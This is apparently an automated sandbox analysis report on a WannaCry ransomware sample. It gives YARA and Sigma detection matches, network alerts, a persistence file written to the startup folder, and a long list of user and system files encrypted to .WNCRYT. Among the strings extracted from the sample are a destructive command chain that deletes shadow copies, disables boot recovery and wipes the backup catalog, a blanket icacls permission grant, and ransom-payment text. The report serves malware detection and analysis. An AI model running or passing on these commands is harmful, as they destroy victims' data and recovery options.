0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Sigma Signatures

System Summary

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe, ProcessId: 7508, TargetFilename: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD3BE3.tmp

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript.exe //nologo m.vbs, CommandLine: cscript.exe //nologo m.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c 70341721944935.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7716, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo m.vbs, ProcessId: 7780, ProcessName: cscript.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET JA3 Hash - Possible Malware - Malspam - Source IP: 192.168.2.9 - Destination IP: 192.160.102.164

Timestamp:	2024-07-26T00:01:38.071384+0200
SID:	2028377
Source Port:	49713
Destination Port:	9001
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.9

Timestamp:	2024-07-26T00:02:01.801265+0200
SID:	2022930
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.9

Timestamp:	2024-07-26T00:02:40.197188+0200
SID:	2022930
Source Port:	443
Destination Port:	49709
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002A_126.EXE.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\@WanaDecryptor@.exe

Avira: detection malicious, Label: TR/FileCoder.724645

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\@WanaDecryptor@.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002A_126.EXE.exe

Joe Sandbox ML: detected

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: ntkrnlmp.pdb source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.2608335757.0000000000B12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.2608335757.0000000000B12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 10-15-18-157.logT source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.2608335757.0000000000B12000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\taskdl.exe

Code function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,

6_2_00401080

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\~SD1D8B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\Apps\~SD746.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\GenuineTicket\~SD747.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\~SD1DAF.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\~SD1DAE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\~SD1DC0.tmp	Jump to behavior

Source: m_danish.wnry.0.dr	String found in binary or memory: http://schemas.micr
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=how

Spam, unwanted Advertisements and Ransom Demands

Yara detected Wannacry ransomware

Source: Yara match	File source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE
Source: Yara match	File source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1788065356.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_126.EXE.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\u.wnry, type: DROPPED

Deletes shadow drive data (may be related to ransomware)

Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &i
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &i

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File moved: C:\Users\user\Desktop\QVTVNIBKSD\NHPKIZUUSG.jpg	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File deleted: C:\Users\user\Desktop\QVTVNIBKSD\NHPKIZUUSG.jpg	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File moved: C:\Users\user\Desktop\MNULNCRIYC\ZBEDCJPBEY.mp3	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File moved: C:\Users\user\Desktop\MNULNCRIYC.jpg	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File deleted: C:\Users\user\Desktop\MNULNCRIYC.jpg	Jump to behavior

Writes many files with high entropy

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRYT entropy: 7.9987170807	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT entropy: 7.99868843082	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js.WNCRYT entropy: 7.99904183102	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\hAbWEdFpz7sABSGHo92EV1SPXRQ.br[1].js.WNCRYT entropy: 7.99894651575	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js.WNCRYT entropy: 7.99990192308	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT entropy: 7.99963359074	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.WNCRYT entropy: 7.99540661384	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT entropy: 7.99833503001	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js.WNCRYT entropy: 7.99538494931	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRYT entropy: 7.99389233803	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.WNCRYT entropy: 7.99843592749	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99968749169	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99934891564	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99762117995	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.WNCRYT entropy: 7.99933248051	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.WNCRYT entropy: 7.9996673097	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.WNCRYT entropy: 7.99676836192	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.WNCRYT entropy: 7.99691012928	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.WNCRYT entropy: 7.99792593802	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRYT entropy: 7.99965323322	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\1VJI1O8Q\X4wIjRXDbKeGz0mzi-NAovdjKMM.br[1].js.WNCRYT entropy: 7.99732611903	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRYT entropy: 7.99945223672	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRYT entropy: 7.99966952215	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\HXWKPVWZ\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.WNCRYT entropy: 7.99289268442	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\P24NZ9IW\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRYT entropy: 7.99390922204	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRYT entropy: 7.99985774893	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\HXWKPVWZ\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRYT entropy: 7.99582727857	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{1F3E7B1E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99956594086	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.WNCRYT entropy: 7.9972087576	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRYT entropy: 7.99821758441	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRYT entropy: 7.99963552222	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99302264369	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRYT entropy: 7.99896243712	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.99999027356	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99909898076	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-GB\WelcomeFax.tif.WNCRYT entropy: 7.99788521438	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99668514583	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99378226164	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\P24NZ9IW\sharedscripts-939520eada[1].js.WNCRYT entropy: 7.99640498775	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\A2C4612B-C11F-4E4C-8240-7294F3668696\operations.db.WNCRYT entropy: 7.99998437313	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99988507517	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99847065788	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99988817093	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.99497218578	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT entropy: 7.99844294939	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99856064717	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\9AG3H7PO\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRYT entropy: 7.99127442197	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99410816118	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\M1FDD3EN\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js.WNCRYT entropy: 7.996526952	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\M1PE9Y29\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRYT entropy: 7.99139906879	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99801723994	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db.WNCRYT entropy: 7.99933304463	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db.WNCRYT entropy: 7.99944602742	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000d.db.WNCRYT entropy: 7.99938184882	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700847494859.txt.WNCRYT entropy: 7.99835379204	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409701041821502.txt.WNCRYT entropy: 7.99821821966	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409701427142301.txt.WNCRYT entropy: 7.99805119676	Jump to dropped file
